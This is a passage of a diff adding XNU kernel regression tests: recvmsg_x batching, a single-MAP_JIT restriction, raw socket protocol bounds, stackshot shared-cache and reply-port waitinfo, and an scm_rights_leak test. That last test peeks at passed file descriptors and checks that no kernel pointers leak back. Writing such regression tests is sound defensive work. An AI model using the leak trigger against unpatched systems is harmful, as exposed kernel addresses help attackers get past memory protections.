+               test_thread_port_mig_intrans(thread_ports[i], thread_flavors[i]);
+       }
+
+       for (size_t i = 0; i < THREAD_PORT_COUNT; i++) {
+               mach_port_deallocate(mach_task_self(), thread_ports[i]);
+       }
+}
diff --git a/tests/recvmsg_x_test.c b/tests/recvmsg_x_test.c
new file mode 100644 (file)
index 0000000..fb86f46
--- /dev/null
@@ -0,0 +1,216 @@
+/*
+ * Copyright (c) 2020 Apple Inc. All rights reserved.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
+ *
+ * This file contains Original Code and/or Modifications of Original Code
+ * as defined in and that are subject to the Apple Public Source License
+ * Version 2.0 (the 'License'). You may not use this file except in
+ * compliance with the License. The rights granted to you under the License
+ * may not be used to create, or enable the creation or redistribution of,
+ * unlawful or unlicensed copies of an Apple operating system, or to
+ * circumvent, violate, or enable the circumvention or violation of, any
+ * terms of an Apple operating system software license agreement.
+ *
+ * Please obtain a copy of the License at
+ * http://www.opensource.apple.com/apsl/ and read it before using this file.
+ *
+ * The Original Code and all software distributed under the License are
+ * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
+ * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
+ * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
+ * Please see the License for the specific language governing rights and
+ * limitations under the License.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
+ */
+
+/* -*- compile-command: "xcrun --sdk iphoneos.internal make recvmsg_x_test" -*- */
+
+
+#include <sys/errno.h>
+#include <sys/fcntl.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+#include <stdbool.h>
+#include <err.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sysexits.h>
+#include <unistd.h>
+
+#include <darwintest.h>
+#include <darwintest_utils.h>
+
+#define NMSGS       5
+#define BUFFERLEN   1000
+
+T_GLOBAL_META(T_META_NAMESPACE("xnu.net"));
+
+static void
+sendPackets(int s, struct sockaddr *dst, unsigned int numMsg, size_t bufferLen)
+{
+       ssize_t count = 0;
+       struct msghdr msg = {};
+       struct iovec vec = {};
+       char *bytes = calloc(1, bufferLen);
+       if (bytes == NULL) {
+               err(EX_OSERR, "calloc()");
+       }
+
+       vec.iov_base = bytes;
+       vec.iov_len = bufferLen;
+
+       msg.msg_name = (void *)dst;
+       msg.msg_namelen = dst->sa_len;
+       msg.msg_iov = &vec;
+       msg.msg_iovlen = 1;
+       msg.msg_flags = 0;
+
+       for (unsigned int i = 0; i < numMsg; i++) {
+               ssize_t n;
+               T_QUIET; T_EXPECT_POSIX_SUCCESS(n = sendmsg(s, &msg, 0), "sendmsg()");
+               T_LOG("Sent %ld bytes\n", n);
+               count += 1;
+       }
+
+       // Wait a bit to make sure the packets reach the receiver
+       usleep(100000);
+
+       T_LOG("Sent %ld packet\n", count);
+
+       free(bytes);
+}
+
+static void
+recvPackets_x(int s, unsigned int numMsg, size_t buflen, socklen_t cmsgLen)
+{
+       struct msghdr_x *msgList;
+       struct sockaddr_in *srcAddrs;
+       struct iovec *vec;
+       char *buffers;
+       char *cmsgBuf;
+
+       T_QUIET; T_ASSERT_NOTNULL(msgList = calloc(numMsg, sizeof(struct msghdr_x)), "msgList calloc()");
+       T_QUIET; T_ASSERT_NOTNULL(srcAddrs = calloc(numMsg, sizeof(struct sockaddr_in)), "srcAddrs calloc()");
+       T_QUIET; T_ASSERT_NOTNULL(vec = calloc(numMsg, sizeof(struct iovec)), "vec calloc()");
+       T_QUIET; T_ASSERT_NOTNULL(buffers = calloc(numMsg, buflen), "buffers calloc()");
+       T_QUIET; T_ASSERT_NOTNULL(cmsgBuf = calloc(numMsg, ALIGN(cmsgLen)), "cmsgBuf calloc()");
+
+       u_int count = 0;
+       while (true) {
+               /*
+                * Wrap around when we've exhausted the list
+                */
+               if ((count % numMsg) == 0) {
+                       for (unsigned int i = 0; i < numMsg; i++) {
+                               struct msghdr_x *msg = &msgList[i];
+                               msg->msg_name = &srcAddrs[i];
+                               msg->msg_namelen = sizeof(srcAddrs[i]);
+                               vec[i].iov_base = buffers + (i * buflen);
+                               vec[i].iov_len = buflen;
+                               msg->msg_iov = &vec[i];
+                               msg->msg_iovlen = 1;
+                               msg->msg_control = cmsgBuf + (i * ALIGN(cmsgLen));
+                               msg->msg_controllen = cmsgLen;
+                               msg->msg_flags = 0;
+
+                               T_QUIET; T_EXPECT_TRUE((uintptr_t)msg->msg_control % sizeof(uint32_t) == 0, NULL);
+                       }
+               }
+
+               ssize_t n = recvmsg_x(s, msgList + (count % numMsg), numMsg - (count % numMsg), 0);
+               if (n < 0) {
+                       if (errno == EINTR) {
+                               T_LOG("recvmsg_x(): %s", strerror(errno));
+                               continue;
+                       }
+                       if (errno == EWOULDBLOCK) {
+                               T_LOG("recvmsg_x(): %s", strerror(errno));
+                               break;
+                       }
+                       T_FAIL("recvmsg_x() failed: %s", strerror(errno));
+               }
+               T_LOG("recvmsg_x returned %ld packets\n", n);
+
+               for (unsigned int i = count; i < count + (u_int)n; i++) {
+                       struct msghdr_x *msg = &msgList[i % numMsg];
+
+                       T_LOG("Received packet #%d %lu bytes with recvmsg_x(), msg_namelen = %u, msg_controllen = %d -> %d, msg_flags = 0x%x\n",
+                           i + 1, msg->msg_datalen, msg->msg_namelen, cmsgLen, msg->msg_controllen, msg->msg_flags);
+
+                       struct cmsghdr *cmsg;
+
+                       for (cmsg = CMSG_FIRSTHDR(msg); cmsg; cmsg = CMSG_NXTHDR(msg, cmsg)) {
+                               T_QUIET; T_EXPECT_TRUE((uintptr_t)cmsg % sizeof(uint32_t) == 0, NULL);
+
+                               T_LOG("level = %d, type = %d, length = %d\n", cmsg->cmsg_level, cmsg->cmsg_type, cmsg->cmsg_len);
+                       }
+               }
+
+               count += (u_int)n;
+       }
+
+       free(msgList);
+       free(srcAddrs);
+       free(vec);
+       free(buffers);
+       free(cmsgBuf);
+}
+
+T_DECL(recvmsg_x_test, "exercise revcmsg_x() with various parameter")
+{
+       struct sockaddr_in addr = {
+               .sin_len = sizeof(addr),
+               .sin_family = AF_INET,
+               .sin_addr.s_addr = htonl(0x7f000001),
+               .sin_port = 0
+       };
+
+       int recvSocket;
+       T_QUIET; T_EXPECT_POSIX_SUCCESS(recvSocket = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP), "socket()");
+       T_QUIET; T_EXPECT_POSIX_SUCCESS(bind(recvSocket, (const struct sockaddr *)&addr, sizeof(addr)), "bind()");
+
+       socklen_t addrLen = sizeof(addr);
+       T_QUIET; T_EXPECT_POSIX_SUCCESS(getsockname(recvSocket, (struct sockaddr *)&addr, &addrLen), "getsockname()");
+
+       int one = 1;
+       T_QUIET; T_EXPECT_POSIX_SUCCESS(setsockopt(recvSocket, IPPROTO_IP, IP_RECVPKTINFO, (void *)&one, sizeof(one)), "setsockopt(IP_RECVPKTINFO)");
+
+       int flags = fcntl(recvSocket, F_GETFL, 0);
+       T_QUIET; T_EXPECT_POSIX_SUCCESS(fcntl(recvSocket, F_SETFL, flags | O_NONBLOCK), "fcntl()");
+
+       int sendSocket;
+       T_QUIET; T_EXPECT_POSIX_SUCCESS(sendSocket = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP), "sendSocket socket()");
+
+       for (int dontTrunc = 0; dontTrunc <= 1; dontTrunc++) {
+               T_QUIET; T_EXPECT_POSIX_SUCCESS(setsockopt(recvSocket, SOL_SOCKET, SO_DONTTRUNC, (void *)&dontTrunc, sizeof(dontTrunc)), "setsockopt(SO_DONTTRUNC)");
+
+               T_LOG("\n================= recvmsg_x() test =================\n");
+               sendPackets(sendSocket, (struct sockaddr *)&addr, NMSGS, BUFFERLEN);
+               recvPackets_x(recvSocket, NMSGS, BUFFERLEN, 50);
+
+               T_LOG("\n================= recvmsg_x() test =================\n");
+               sendPackets(sendSocket, (struct sockaddr *)&addr, NMSGS, BUFFERLEN);
+               recvPackets_x(recvSocket, NMSGS, BUFFERLEN * 2, 50);
+
+               T_LOG("\n================= recvmsg_x() test =================\n");
+               sendPackets(sendSocket, (struct sockaddr *)&addr, NMSGS, BUFFERLEN);
+               recvPackets_x(recvSocket, NMSGS, BUFFERLEN / 2, 50);
+
+               T_LOG("\n================= recvmsg_x() test =================\n");
+               sendPackets(sendSocket, (struct sockaddr *)&addr, NMSGS, BUFFERLEN);
+               recvPackets_x(recvSocket, NMSGS, BUFFERLEN, 10);
+
+               T_LOG("\n================= recvmsg_x() test =================\n");
+               sendPackets(sendSocket, (struct sockaddr *)&addr, NMSGS, BUFFERLEN);
+               recvPackets_x(recvSocket, NMSGS, BUFFERLEN / 2, 10);
+       }
+
+       close(sendSocket);
+       close(recvSocket);
+
+       T_LOG("\n================= PASS =================\n");
+}
diff --git a/tests/restrict_jit.c b/tests/restrict_jit.c
new file mode 100644 (file)
index 0000000..d7f824e
--- /dev/null
@@ -0,0 +1,33 @@
+#include <stdlib.h>
+#include <unistd.h>
+#include <sys/sysctl.h>
+#include <sys/mman.h>
+
+#include <darwintest.h>
+
+
+/*
+ * macOS only test. Try to map 2 different MAP_JIT regions. 2nd should fail.
+ */
+T_DECL(restrict_jit, "macOS restricted JIT entitlement test")
+{
+#if TARGET_OS_OSX
+       void *addr1;
+       void *addr2;
+       size_t size = 64 * 1024;
+
+
+       addr1 = mmap(NULL, size, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_ANON | MAP_PRIVATE | MAP_JIT, -1, 0);
+       T_ASSERT_NE_PTR(addr1, MAP_FAILED, "First map MAP_JIT");
+
+       addr2 = mmap(NULL, size, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_ANON | MAP_PRIVATE | MAP_JIT, -1, 0);
+       if (addr2 == MAP_FAILED) {
+               T_PASS("Only one MAP_JIT was allowed");
+       } else {
+               T_FAIL("Second MAP_JIT was allowed");
+       }
+
+#else
+       T_SKIP("Not macOS");
+#endif
+}
diff --git a/tests/restrict_jit.entitlements b/tests/restrict_jit.entitlements
new file mode 100644 (file)
index 0000000..f9b25e2
--- /dev/null
@@ -0,0 +1,12 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
+<plist version="1.0">
+<dict>
+       <key>dynamic-codesigning</key>
+       <true/>
+       <key>com.apple.security.cs.allow-jit</key>
+       <true/>
+       <key>com.apple.security.cs.single-jit</key>
+       <true/>
+</dict>
+</plist>
diff --git a/tests/scm_rights_leak.c b/tests/scm_rights_leak.c
new file mode 100644 (file)
index 0000000..ac549b0
--- /dev/null
@@ -0,0 +1,108 @@
+/*
+ * Copyright (c) 2021 Apple Inc. All rights reserved.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
+ *
+ * This file contains Original Code and/or Modifications of Original Code
+ * as defined in and that are subject to the Apple Public Source License
+ * Version 2.0 (the 'License'). You may not use this file except in
+ * compliance with the License. The rights granted to you under the License
+ * may not be used to create, or enable the creation or redistribution of,
+ * unlawful or unlicensed copies of an Apple operating system, or to
+ * circumvent, violate, or enable the circumvention or violation of, any
+ * terms of an Apple operating system software license agreement.
+ *
+ * Please obtain a copy of the License at
+ * http://www.opensource.apple.com/apsl/ and read it before using this file.
+ *
+ * The Original Code and all software distributed under the License are
+ * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
+ * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
+ * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
+ * Please see the License for the specific language governing rights and
+ * limitations under the License.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
+ */
+
+#include <sys/socket.h>
+#include <sys/un.h>
+
+#include <stdlib.h>
+#include <unistd.h>
+
+#include <darwintest.h>
+
+#define MAX_SOCK 10
+
+T_DECL(scm_rights_leak, "test leak of file pointers by peeking SCM_RIGHTS")
+{
+       int pair[2];
+
+       T_ASSERT_POSIX_SUCCESS(socketpair(AF_UNIX, SOCK_STREAM, 0, pair),
+           NULL);
+
+       struct cmsghdr *cmsg;
+       T_ASSERT_NOTNULL(cmsg = calloc(1, MAX_SOCK * sizeof(int)), "calloc");
+       cmsg->cmsg_len = CMSG_LEN(MAX_SOCK * sizeof(int));
+       cmsg->cmsg_level = SOL_SOCKET;
+       cmsg->cmsg_type = SCM_RIGHTS;
+
+       int *sock_fds = (int *)(void *)CMSG_DATA(cmsg);
+       for (int i = 0; i < MAX_SOCK; i++) {
+               T_ASSERT_POSIX_SUCCESS(sock_fds[i] = socket(AF_UNIX, SOCK_DGRAM, 0), NULL);
+       }
+       for (int i = 0; i < MAX_SOCK; i++) {
+               fprintf(stderr, "sock_fds[%d] %i\n", i, sock_fds[i]);
+       }
+
+       struct iovec iovec[1];
+       char data = 'x';
+       iovec[0].iov_base = &data;
+       iovec[0].iov_len = 1;
+
+       struct msghdr mh;
+       mh.msg_name = 0;
+       mh.msg_namelen = 0;
+       mh.msg_iov = iovec;
+       mh.msg_iovlen = 1;
+       mh.msg_control = cmsg;
+       mh.msg_controllen = cmsg->cmsg_len;
+       mh.msg_flags = 0;
+
+       ssize_t ssize;
+       ssize = sendmsg(pair[0], &mh, 0);
+       T_ASSERT_EQ(ssize, (ssize_t)1, "sendmsg");
+
+       struct cmsghdr *rcmsg;
+       T_EXPECT_POSIX_SUCCESS_(rcmsg = calloc(2048, 1), "calloc");
+
+       mh.msg_name = 0;
+       mh.msg_namelen = 0;
+       mh.msg_iov = iovec;
+       mh.msg_iovlen = 1;
+       mh.msg_control = rcmsg;
+       mh.msg_controllen = 2048;
+       mh.msg_flags = 0;
+
+       ssize = recvmsg(pair[1], &mh, MSG_PEEK);
+       T_ASSERT_POSIX_SUCCESS(ssize, "recvmsg");
+       uintptr_t *r_ptrs = (uintptr_t *)(void *)CMSG_DATA(rcmsg);
+       socklen_t nptrs = (rcmsg->cmsg_len - CMSG_LEN(0)) / sizeof(uintptr_t);
+       for (socklen_t i = 0; i < nptrs; i++) {
+               T_EXPECT_EQ(r_ptrs[i], (uintptr_t)0, "r_ptrs[%u] 0x%lx\n", i, r_ptrs[i]);
+       }
+
+       ssize = recvmsg(pair[1], &mh, 0);
+       T_ASSERT_POSIX_SUCCESS(ssize, "recvmsg");
+       int *r_fds = (int *)(void *)CMSG_DATA(rcmsg);
+       for (int i = 0; i < MAX_SOCK; i++) {
+               T_EXPECT_NE(r_fds[i], 0, "r_fds[%d] %i\n", i, r_fds[i]);
+       }
+
+       free(cmsg);
+       free(rcmsg);
+       close(pair[0]);
+       close(pair[1]);
+}
diff --git a/tests/socket_raw_uint8_max.c b/tests/socket_raw_uint8_max.c
new file mode 100644 (file)
index 0000000..44d01c1
--- /dev/null
@@ -0,0 +1,13 @@
+#include <darwintest.h>
+#include <sys/socket.h>
+
+T_DECL(socket_raw_uint8_max, "create socket with borderline proto numbers")
+{
+       int fd = socket(AF_INET, SOCK_RAW, 256);
+
+       T_ASSERT_POSIX_FAILURE(fd, EINVAL, "socket(AF_INET, SOCK_RAW, 256);");
+
+       int fd2 = socket(AF_INET, SOCK_RAW, 255);
+
+       T_ASSERT_POSIX_SUCCESS(fd2, "socket(AF_INET, SOCK_RAW, 255);");
+}
index ce904d2d8bdc5315f4bca29830b776cf905cce18..ae6aef50f77f4fd09ba33bc2f1feb874ef561dcc 100644 (file)
@@ -14,6 +14,7 @@
 #include <uuid/uuid.h>
 #include <servers/bootstrap.h>
 #include <pthread/workqueue_private.h>
+#include <dispatch/private.h>
 #import <zlib.h>
 
 T_GLOBAL_META(
@@ -46,13 +47,17 @@ static uint64_t global_flags = 0;
 #define PARSE_STACKSHOT_WAITINFO_CSEG        0x40
 #define PARSE_STACKSHOT_WAITINFO_SRP         0x80
 #define PARSE_STACKSHOT_TRANSLATED           0x100
+#define PARSE_STACKSHOT_SHAREDCACHE_FLAGS    0x200
 
 /* keys for 'extra' dictionary for parse_stackshot */
 static const NSString* zombie_child_pid_key = @"zombie_child_pid"; // -> @(pid), required for PARSE_STACKSHOT_ZOMBIE
 static const NSString* postexec_child_unique_pid_key = @"postexec_child_unique_pid";  // -> @(unique_pid), required for PARSE_STACKSHOT_POSTEXEC
 static const NSString* cseg_expected_threadid_key = @"cseg_expected_threadid"; // -> @(tid), required for PARSE_STACKSHOT_WAITINFO_CSEG
-static const NSString* srp_expected_pid_key = @"srp_expected_pid"; // -> @(pid), required for PARSE_STACKSHOT_WAITINFO_SRP
+static const NSString* srp_expected_threadid_key = @"srp_expected_threadid"; // -> @(tid), this or ..._pid required for PARSE_STACKSHOT_WAITINFO_SRP
+static const NSString* srp_expected_pid_key = @"srp_expected_pid"; // -> @(pid), this or ..._threadid required for PARSE_STACKSHOT_WAITINFO_SRP
 static const NSString* translated_child_pid_key = @"translated_child_pid"; // -> @(pid), required for PARSE_STACKSHOT_TRANSLATED
+static const NSString* sharedcache_child_pid_key = @"sharedcache_child_pid"; // @(pid), required for PARSE_STACKSHOT_SHAREDCACHE_FLAGS
+static const NSString* sharedcache_child_sameaddr_key = @"sharedcache_child_sameaddr"; // @(0 or 1), required for PARSE_STACKSHOT_SHAREDCACHE_FLAGS
 
 #define TEST_STACKSHOT_QUEUE_LABEL        "houston.we.had.a.problem"
 #define TEST_STACKSHOT_QUEUE_LABEL_LENGTH sizeof(TEST_STACKSHOT_QUEUE_LABEL)
@@ -371,19 +376,18 @@ T_DECL(stress, "test that taking stackshots for 60 seconds doesn't crash the sys
                                STACKSHOT_SAVE_LOADINFO |
                                STACKSHOT_SAVE_KEXT_LOADINFO |
                                STACKSHOT_GET_GLOBAL_MEM_STATS |
-                               // STACKSHOT_GET_BOOT_PROFILE |
                                STACKSHOT_SAVE_IMP_DONATION_PIDS |
                                STACKSHOT_COLLECT_SHAREDCACHE_LAYOUT |
                                STACKSHOT_THREAD_GROUP |
                                STACKSHOT_SAVE_JETSAM_COALITIONS |
                                STACKSHOT_ASID |
-                               // STACKSHOT_PAGE_TABLES |
                                0),
        };
 
        start_time = clock_gettime_nsec_np(CLOCK_MONOTONIC);
        while (clock_gettime_nsec_np(CLOCK_MONOTONIC) - start_time < max_diff_time) {
-               take_stackshot(&scenario, false, ^(void *ssbuf, size_t sslen) {
+               take_stackshot(&scenario, false, ^(void * __unused ssbuf,
+                               size_t __unused sslen) {
                        printf(".");
                        fflush(stdout);
                });
@@ -435,6 +439,100 @@ T_DECL(dispatch_queue_label, "test that kcdata stackshots contain libdispatch qu
        dispatch_semaphore_signal(parent_done_sem);
 }
 
+#define CACHEADDR_ENV "STACKSHOT_TEST_DYLDADDR"
+T_HELPER_DECL(spawn_reslide_child, "child process to spawn with alternate slide")
+{
+       size_t shared_cache_len;
+       const void *addr, *prevaddr;
+       uintmax_t v;
+       char *endptr;
+
+       const char *cacheaddr_env = getenv(CACHEADDR_ENV);
+       T_QUIET; T_ASSERT_NOTNULL(cacheaddr_env, "getenv("CACHEADDR_ENV")");
+       errno = 0;
+       endptr = NULL;
+       v = strtoumax(cacheaddr_env, &endptr, 16);      /* read hex value */
+       T_WITH_ERRNO; T_QUIET; T_ASSERT_NE(v, 0l, "getenv(%s) = \"%s\" should be a non-zero hex number", CACHEADDR_ENV, cacheaddr_env);
+       T_QUIET; T_ASSERT_EQ(*endptr, 0, "getenv(%s) = \"%s\" endptr \"%s\" should be empty", CACHEADDR_ENV, cacheaddr_env, endptr);
+
+       prevaddr = (const void *)v;
+       addr = _dyld_get_shared_cache_range(&shared_cache_len);
+       T_QUIET; T_ASSERT_NOTNULL(addr, "shared cache address");
+
+       T_QUIET; T_ASSERT_POSIX_SUCCESS(kill(getppid(), (addr == prevaddr) ? SIGUSR2 : SIGUSR1), "signaled parent to take stackshot");
+       for (;;) {
+               (void) pause();         /* parent will kill -9 us */
+       }
+}
+
+T_DECL(shared_cache_flags, "tests stackshot's task_ss_flags for the shared cache")
+{
+       posix_spawnattr_t               attr;
+       char *env_addr;
+       char path[PATH_MAX];
+       __block bool child_same_addr = false;
+
+       uint32_t path_size = sizeof(path);
+       T_QUIET; T_ASSERT_POSIX_ZERO(_NSGetExecutablePath(path, &path_size), "_NSGetExecutablePath");
+       char *args[] = { path, "-n", "spawn_reslide_child", NULL };
+       pid_t pid;
+       size_t shared_cache_len;
+       const void *addr;
+
+       dispatch_source_t child_diffsig_src, child_samesig_src;
+       dispatch_semaphore_t child_ready_sem = dispatch_semaphore_create(0);
+       T_QUIET; T_ASSERT_NOTNULL(child_ready_sem, "shared_cache child semaphore");
+
+       dispatch_queue_t signal_processing_q = dispatch_queue_create("signal processing queue", NULL);
+       T_QUIET; T_ASSERT_NOTNULL(signal_processing_q, "signal processing queue");
+
+       signal(SIGUSR1, SIG_IGN);
+       signal(SIGUSR2, SIG_IGN);
+       child_samesig_src = dispatch_source_create(DISPATCH_SOURCE_TYPE_SIGNAL, SIGUSR1, 0, signal_processing_q);
+       T_QUIET; T_ASSERT_NOTNULL(child_samesig_src, "dispatch_source_create (child_samesig_src)");
+       child_diffsig_src = dispatch_source_create(DISPATCH_SOURCE_TYPE_SIGNAL, SIGUSR2, 0, signal_processing_q);
+       T_QUIET; T_ASSERT_NOTNULL(child_diffsig_src, "dispatch_source_create (child_diffsig_src)");
+
+       /* child will signal us depending on if their addr is the same or different */
+       dispatch_source_set_event_handler(child_samesig_src, ^{ child_same_addr = false; dispatch_semaphore_signal(child_ready_sem); });
+       dispatch_source_set_event_handler(child_diffsig_src, ^{ child_same_addr = true; dispatch_semaphore_signal(child_ready_sem); });
+       dispatch_activate(child_samesig_src);
+       dispatch_activate(child_diffsig_src);
+
+       addr = _dyld_get_shared_cache_range(&shared_cache_len);
+       T_QUIET; T_ASSERT_NOTNULL(addr, "shared cache address");
+
+       T_QUIET; T_ASSERT_POSIX_SUCCESS(asprintf(&env_addr, "%p", addr), "asprintf of env_addr succeeded");
+       T_QUIET; T_ASSERT_POSIX_SUCCESS(setenv(CACHEADDR_ENV, env_addr, true), "setting "CACHEADDR_ENV" to %s", env_addr);
+
+       T_QUIET; T_ASSERT_POSIX_ZERO(posix_spawnattr_init(&attr), "posix_spawnattr_init");
+       T_QUIET; T_ASSERT_POSIX_ZERO(posix_spawnattr_setflags(&attr, _POSIX_SPAWN_RESLIDE), "posix_spawnattr_setflags");
+       int sp_ret = posix_spawn(&pid, path, NULL, &attr, args, environ);
+       T_ASSERT_POSIX_ZERO(sp_ret, "spawned process '%s' with PID %d", args[0], pid);
+
+       dispatch_semaphore_wait(child_ready_sem, DISPATCH_TIME_FOREVER);
+       T_LOG("received signal from child (%s), capturing stackshot", child_same_addr ? "same shared cache addr" : "different shared cache addr");
+
+       struct scenario scenario = {
+               .name = "shared_cache_flags",
+               .flags = (STACKSHOT_SAVE_LOADINFO | STACKSHOT_GET_GLOBAL_MEM_STATS
+                               | STACKSHOT_COLLECT_SHAREDCACHE_LAYOUT
+                               | STACKSHOT_SAVE_IMP_DONATION_PIDS | STACKSHOT_KCDATA_FORMAT),
+       };
+
+       take_stackshot(&scenario, false, ^( void *ssbuf, size_t sslen) {
+               int status;
+               /* First kill the child so we can reap it */
+               T_QUIET; T_ASSERT_POSIX_SUCCESS(kill(pid, SIGKILL), "killing spawned process");
+               T_QUIET; T_ASSERT_POSIX_SUCCESS(waitpid(pid, &status, 0), "waitpid on spawned child");
+               T_QUIET; T_ASSERT_EQ(!!WIFSIGNALED(status), 1, "waitpid status should be signalled");
+               T_QUIET; T_ASSERT_EQ(WTERMSIG(status), SIGKILL, "waitpid status should be SIGKILLed");
+
+               parse_stackshot(PARSE_STACKSHOT_SHAREDCACHE_FLAGS, ssbuf, sslen, 
+                       @{sharedcache_child_pid_key: @(pid), sharedcache_child_sameaddr_key: @(child_same_addr ? 1 : 0)});
+       });
+}
+
 static void *stuck_sysctl_thread(void *arg) {
        int val = 1;
        dispatch_semaphore_t child_thread_started = *(dispatch_semaphore_t *)arg;
@@ -1013,7 +1111,7 @@ static void stackshot_verify_current_proc_uuid_info(void **ssbuf, size_t sslen,
 T_DECL(translated, "tests translated bit is set correctly")
 {
 #if !(TARGET_OS_OSX && TARGET_CPU_ARM64)
-       T_SKIP("Not arm mac")
+       T_SKIP("Only valid on Apple silicon Macs")
 #endif
        // Get path of stackshot_translated_child helper binary
        char path[PATH_MAX];
@@ -1052,7 +1150,7 @@ T_DECL(translated, "tests translated bit is set correctly")
        struct kinfo_proc process_info;
        size_t bufsize = sizeof(process_info);
        T_QUIET; T_ASSERT_POSIX_SUCCESS(sysctl(mib, (unsigned)(sizeof(mib)/sizeof(int)), &process_info, &bufsize, NULL, 0), "get translated child process info");
-       T_QUIET; T_ASSERT_GT(bufsize, 0, "process info is not empty");
+       T_QUIET; T_ASSERT_GT(bufsize, (size_t)0, "process info is not empty");
        T_QUIET; T_ASSERT_TRUE((process_info.kp_proc.p_flag & P_TRANSLATED), "KERN_PROC_PID reports child is translated");
        
        T_LOG("capturing stackshot");
@@ -1064,13 +1162,14 @@ T_DECL(translated, "tests translated bit is set correctly")
        };
        
        take_stackshot(&scenario, true, ^( void *ssbuf, size_t sslen) {
-               // Kill the child
-               int status;
-               T_QUIET; T_ASSERT_POSIX_SUCCESS(kill(pid, SIGTERM), "kill translated child");
-               T_QUIET; T_ASSERT_POSIX_SUCCESS(waitpid(pid, &status, 0), "waitpid on translated child");
-               
                parse_stackshot(PARSE_STACKSHOT_TRANSLATED, ssbuf, sslen, @{translated_child_pid_key: @(pid)});
        });
+
+    // Kill the child
+    int status;
+    T_QUIET; T_ASSERT_POSIX_SUCCESS(kill(pid, SIGTERM), "kill translated child");
+    T_QUIET; T_ASSERT_POSIX_SUCCESS(waitpid(pid, &status, 0), "waitpid on translated child");
+
 }
 
 T_DECL(proc_uuid_info, "tests that the main binary UUID for a proc is always populated")
@@ -1127,7 +1226,6 @@ T_DECL(proc_uuid_info, "tests that the main binary UUID for a proc is always pop
 
 T_DECL(cseg_waitinfo, "test that threads stuck in the compressor report correct waitinfo")
 {
-       int val = 1;
        struct scenario scenario = {
                .name = "cseg_waitinfo",
                .quiet = false,
@@ -1141,6 +1239,7 @@ T_DECL(cseg_waitinfo, "test that threads stuck in the compressor report correct
        dispatch_async(dq, ^{
                pthread_threadid_np(NULL, &thread_id);
                dispatch_semaphore_signal(child_ok);
+               int val = 1;
                T_ASSERT_POSIX_SUCCESS(sysctlbyname("kern.cseg_wedge_thread", NULL, NULL, &val, sizeof(val)), "wedge child thread");
        });
 
@@ -1149,6 +1248,7 @@ T_DECL(cseg_waitinfo, "test that threads stuck in the compressor report correct
 
        T_LOG("taking stackshot");
        take_stackshot(&scenario, false, ^(void *ssbuf, size_t sslen) {
+               int val = 1;
                T_ASSERT_POSIX_SUCCESS(sysctlbyname("kern.cseg_unwedge_thread", NULL, NULL, &val, sizeof(val)), "unwedge child thread");
                parse_stackshot(PARSE_STACKSHOT_WAITINFO_CSEG, ssbuf, sslen, @{cseg_expected_threadid_key: @(thread_id)});
        });
@@ -1274,6 +1374,42 @@ T_HELPER_DECL(srp_client,
        T_LOG("client process exiting after sending message to parent (server)");
 }
 
+enum srp_test_type {
+       SRP_TEST_THREAD,        /* expect waiter on current thread */
+       SRP_TEST_PID,           /* expect waiter on current PID */
+       SRP_TEST_EITHER,        /* waiter could be on either */
+};
+
+static void
+check_srp_test(const char *name, enum srp_test_type ty)
+{
+       struct scenario scenario = {
+               .name = name,
+               .quiet = false,
+               .flags = (STACKSHOT_THREAD_WAITINFO | STACKSHOT_KCDATA_FORMAT),
+       };
+       uint64_t thread_id = 0;
+       pthread_threadid_np(NULL, &thread_id);
+       if (ty == SRP_TEST_THREAD) {
+               take_stackshot(&scenario, false, ^(void *ssbuf, size_t sslen) {
+                       parse_stackshot(PARSE_STACKSHOT_WAITINFO_SRP, ssbuf, sslen,
+                                       @{srp_expected_threadid_key: @(thread_id)});
+               });
+       } else if (ty == SRP_TEST_PID) {
+               take_stackshot(&scenario, false, ^(void *ssbuf, size_t sslen) {
+                       parse_stackshot(PARSE_STACKSHOT_WAITINFO_SRP, ssbuf, sslen,
+                                       @{srp_expected_pid_key: @(getpid())});
+               });
+       } else {
+               take_stackshot(&scenario, false, ^(void *ssbuf, size_t sslen) {
+                       parse_stackshot(PARSE_STACKSHOT_WAITINFO_SRP, ssbuf, sslen,
+                                       @{srp_expected_pid_key: @(getpid()), srp_expected_threadid_key: @(thread_id)});
+               });
+       }
+
+}
+
+
 /*
  * Tests the stackshot wait info plumbing for synchronous IPC that doesn't use kevent on the server.
  *
@@ -1285,11 +1421,14 @@ T_HELPER_DECL(srp_client,
  *           to a server that receives the message and copies in the send-once right, but doesn't
  *           reply to the client. for this case the special reply port is copied out and the kernel
  *           stashes the info about which task copied out the send once right. (rdar://60440592)
+ * (part 3): tests the same as part 2, but uses kevents, which allow for
+ *           priority inheritance
  */
 T_DECL(special_reply_port, "test that tasks using special reply ports have correct waitinfo")
 {
        dispatch_semaphore_t can_continue  = dispatch_semaphore_create(0);
        dispatch_queue_t dq = dispatch_queue_create("signalqueue", NULL);
+       dispatch_queue_t machdq = dispatch_queue_create("machqueue", NULL);
        dispatch_source_t sig_src;
        char path[PATH_MAX];
        uint32_t path_size = sizeof(path);
@@ -1298,11 +1437,6 @@ T_DECL(special_reply_port, "test that tasks using special reply ports have corre
        pid_t client_pid;
        int sp_ret;
        kern_return_t kr;
-       struct scenario scenario = {
